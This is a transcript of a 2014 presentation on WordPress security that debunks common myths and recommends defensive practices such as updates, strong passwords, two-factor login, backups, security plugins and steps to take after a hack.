WordPress Security Essentials
-
Upload
angela-bowman -
Category
Internet
-
view
353 -
download
0
description
Transcript of WordPress Security Essentials
WORDPRESS SECURITY ESSENTIALS
!Boulder Digital Arts Lunch June 12, 2014
By Angela Bowman, Ask WP Girl
About me
• Hi! My name is Angela Bowman @askwpgirl
• WordPress Instructor at Boulder Digital Arts
• Started using WordPress in 2007
• Used to think: “After I build a site, my job is done.”
• Now take a common sense approach to security that isn’t overwhelming or super technical
Why do we need to have this talk?
• PHP and MySQL are inherently vulnerable
• MySQL: A database where all your content is stored
• PHP: The scripting language used by WordPress, themes and plugins use to access your data and display it in the browser window.
• Hackers exploit poor PHP coding (and other vulnerabilities) to inject content into your database and files via the browser URL and interface
Why are you vulnerable?
• Because your site is on the Internet
• Because it’s easy to exploit known vulnerabilities
• Because we are human NOT Vulcan
• We live by our beliefs rather than logic
WHAT DOES A HACKED FILE LOOK LIKE? UGLY!
VIAGRA ANYONE?
HACKED COMMENTS.PHP
A FILE THAT DOESN’T BELONG - COMMON.PHP
TIMTHUMB HACK
THE MYTHS WE LIVE BY
Inspired by: http://www.problogger.net/archives/2012/08/29/top-10-wordpress-security-myths/ by Anders Vinther of The WordPress Security Checklist.
Truth• Both things are true!
Old versions of WordPress are NOT secure Current WordPress version is secure
Myth #1
“WordPress is (is not) secure.”
Truth• You have an Internet presence even if the pages of your
site aren’t indexed by Google yet
• You need to protect ALL installations of WordPress on your hosting account even if you don’t use them
• Hackers will attempt to exploit things that aren’t even on your site, such as plugins you don’t even have installed
Myth #2 my site isn’t launched yet, so it can’t be hacked
“My site isn’t launched, so it can’t be hacked.”
Myth #2
Truth• Plugins and themes are the #1
way hackers gain access to your site
• Why? From ProBlogger.com: “Experience and programming skills vary greatly, and so does the quality of their work. Even the best programmers make mistakes and all software contains bugs.”
Myth #3“I only use plugins and themes from WordPress.org,
so I am safe!”
Truth• Exploits are published IMMEDIATELY to the web.
• Outdated version of WordPress, themes, and plugins are immediately vulnerable to attack.
• Timthumb script exploit was discovered and exploited on a mass number of blogs within DAYS and is still exploited!
Myth #4“Updating my themes and plugins whenever I login is good enough.”
Truth
Myth #5
“My site is small. It’s not worth hacking.”
“… Although I had updated the majority of sites and had notified former clients, I still hadn’t gotten to some of the smaller sites yet – like my girlfriend’s food blog.
http://wptheming.com/2011/08/cleaning-up-the-timthumb-hack/
“And, word to the wise, your girlfriend’s food blog should always be a top priority.”
Truth• De-activated themes and plugins are just as risky if they
have vulnerable code.
• Because even files of deactivated plugins and themes can be access via the Internet
Myth # 6
“If I de-activate a theme or plugin, there is no risk.”
Truth• Only if you use a site monitoring service or plugin (maybe)
• Your site can be compromised months before you find out
• Many hacks are invisible to visitors to the site and only visible to bots, so you may not know you’ve been hacked until your site is blacklisted
• Some hacks redirect search engine traffic, so you won’t notice if you just go to a specific URL
Myth # 7
“If my site is compromised, I’ll find out right away!”
!http://blog.sucuri.net/2012/07/backdoor-tool-kit-todays-scary-web-malware-reality.html
Truth• Some security plugins can provide a layer of protection
• Security plugins won’t help much if a hacker gains access to your online session, passwords, or sensitive files
• Security plugins won’t help if the web hosting server is compromised
Myth #8
“I can use a security plugin and that will cover me.”
Truth“Only purely random passwords, generated by special purpose generator tokens, drawing from the largest ASCII character sets available can keep a step ahead of cracking programs.”
Myth # 9
“My passwords are good enough.”
http://www.mandylionlabs.com/PRCCalc/BruteForceCalc.htm
Truth• If you discover the hack quickly enough, your web host may
have a backup of the site made before the hack
• Most hosts store one day backup and one weekly backup
• Your host may not be able to help you discover why you were hacked in the first place. You’ll end up restoring hackable files.
Myth #10“If my site is hacked,
my web host can restore it for me.”
WHAT CAN YOU DO TO PROTECT YOUR SITE?
Options
• Set up an altar to the WordPress Gods and do daily puja and offerings
• Throw up your hands and cry
• Drink another beer and try to forget
• Delegate to Tony (Sucuri.net)
• DIY using the following steps
1 – Secure Your Own Computer
• Why bother securing WordPress if you give the keys away?
• Run anti-virus software regularly
• Don’t login via insecure or public WIFI networks
• Use a Virtual Private Network when traveling (such as Astrill)
• Secure your home WIFI network
• Be careful of sites you click on. More than 55,000 malicious web domains existed in 2011.
2 – Update to Current Versions
• Backup database and files
• Delete unused plugins and themes
• Update plugins first (check compatibility)
• Update theme (might be tricky)
• Update WordPress
• Rename plugins folder if site crashes
3 – Protect Login
• If “admin” is the Administrative username, create a new admin user, log out, login as new user, delete old the “admin” user and assign posts/pages to new admin
• Use strong passwords on WordPress, FTP, hosting, and email: • Online Generator:
http://www.pctools.com/guides/password/ • Track Passwords:
http://agilebits.com/products/1Password
3 – Protect Login, continued
• Enable two-way authentication: Using Google Authenticator : http://wordpress.org/extend/plugins/google-authenticator/http://askwpgirl.com/secure-wordpress-two-step-authentication/
• Login using https:// (will need dedicated SSL certificate for domain, which is free with Business level web hosting at Host Gator)
4 – Backup Database and Uploads
• Use backup plugin or service: • Backup Buddy affiliate link: http://askwpgirl.com/go/backupbuddy.php
• BackWPUp: https://wordpress.org/plugins/backwpup/
• VaultPress.com – Backup, one-click restore, and site monitoring
• Backup database (daily or weekly) and full site (weekly or monthly)
• Store backups on remote server (eg Amazon S3)
• Must backup database and wp-content folder
5 – Install Security Plugins
• Install Wordfence http://wordpress.org/extend/plugins/wordfence/
• Settings: http://optimwise.com/wordfence-security-plugin-wordpress-firewall-anti-malware/
6 – Create a Maintenance Plan
• Update sites frequently (as updates available)
• Use Infinite WP to manage multiple sites from a single control panel: http://infinitewp.com/
7 – Best Practices
• Don’t allow users to register (Settings > General)
• Always hold comments for moderation and use spam filtering (aka Akismet)
• Don’t use your username as your Display Name
• Use SFTP for file transfers and secure SMTP for email (ask web host)
7 – Best Practices, continued
• Turn off pingbacks/trackbacks (Settings > Discussion)
• Host site with good web host
• Use plugins and themes with caution - recently updated, going concern. Delete unused ones. but keep one TwentySomething theme installed as a default.
• Submit sites to Google Webmaster Tools. Turn ON email notifications:http://googlewebmastercentral.blogspot.com/2012/07/new-crawl-error-alerts-from-webmaster.html
Summary
• Update, update, update!
• Use caution w/ plugins and themes, delete unused
• Strong usernames and passwords
• Backup! Today!
• Be a smart web user
If you get hacked…
• Contact your web host and see if they can restore the site from a backup (don’t rely on this)
• Contact sucuri.net to scan and clean the hack
• Change all passwords, reset wp-config.php encryption salts
• Check blacklisting status, request review
Resources•Hacked: http://wordpress.org/tags/hacked
•Malware: http://wordpress.org/tags/malware
•http://codex.wordpress.org/Hardening_WordPres
•http://codex.wordpress.org/WordPress_Backups
•http://codex.wordpress.org/FAQ_My_site_was_hacked
•wpsecuritylock.com - resources and services for securing sites
•sucuri.net - free scan, hack recovering, site monitoring
•Wpsecuritychecklist.com – off-site monitoring
Contact
• Angela Bowman askwpgirl.commoongoosedesigns.com
• [email protected]/askwpgirlfacebook.com/askwpgirl.com